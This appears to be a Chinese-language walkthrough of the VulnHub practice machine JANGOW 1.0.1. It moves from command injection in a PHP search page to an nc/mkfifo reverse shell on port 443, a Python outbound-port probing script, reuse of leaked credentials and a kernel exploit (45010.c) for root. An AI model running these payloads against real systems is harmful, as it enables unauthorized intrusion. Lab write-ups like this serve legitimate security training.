vulnhub靶机-JANGOW: 1.0.1

Description
Back to the Top
Difficulty: easy

The secret to this box is enumeration! Inquiries [email protected]

This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0

1、开机（virtualbox）直接得到靶机ip：192.168.43.49

2、扫描靶机端口，开放21、80端口

3、 访问21端口ftp服务不能匿名登录，就只能先放着，转移到80端口，有一个site目录，进入之后像是一个没用的静态网页

由于靶机描述说枚举很重要，所以在这里试了一下遍历路径，发现一个wordpress路径，但是不是wp网站（废掉了），遍历也没得到有用信息

 回到之前那个页面，查看源代码发现一个get传参的php网页（点击网页Buscar也可）

 

4、访问此页面，尝试命令注入，发现成功回显 

 尝试反弹shell失败，参考其他文章后发现靶机做了限制，只能使用443端口反弹

rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fbash+-i+2%3E%261%7Cnc+192.168.43.215+443+%3E%2Ftmp%2Ff

这里可以使用一个小脚本测试一下端口，超时可以设短一点，但是服务器容易崩掉，所以我设的1秒，花费时间有点久

import requests
url = "http://192.168.43.49/site/busque.php?buscar=telnet%20192.168.43.215%20"
for i in range(1,65536):
    try:
        payload = url + str(i)
        req = requests.get(payload,timeout=1)
        if "Trying" in req.text:
            print(i)
    except:
        pass

反弹成功后，升级到智能shell

 5、在wordpress下面有一个config.php文件，有一个用户名和密码，尝试撞库，结果失败

在html目录下有个隐藏文件.backup，也有一个用户名和密码，成功撞库（查看/etc/passwd文件也可发现只有root和jangow01用户）

切换到jangow01用户后，得到user.txt文件内容，但是不能使用sudo命令

6、查看内核版本发现是4.4.0-31，系统版本是Ubuntu16

 kali直接搜索利用脚本，下面几个都试试 

7、由于端口有限制，要么关掉443端口的监听，在其上面开一个web服务传文件上去，或者使用ftp传文件，我这里就演示ftp一种，使用45010.c脚本提权(还有一种笨办法，就是将内容复制上去，不过容易出错)

登录ftp服务，用户名和密码：jangow01/abygurl69，切换到jangow01家目录下，上传45010.c文件

 编译运行脚本成功提权

拿到最后凭证

8、查看一下防火墙规则，确实只允许访问外部的443端口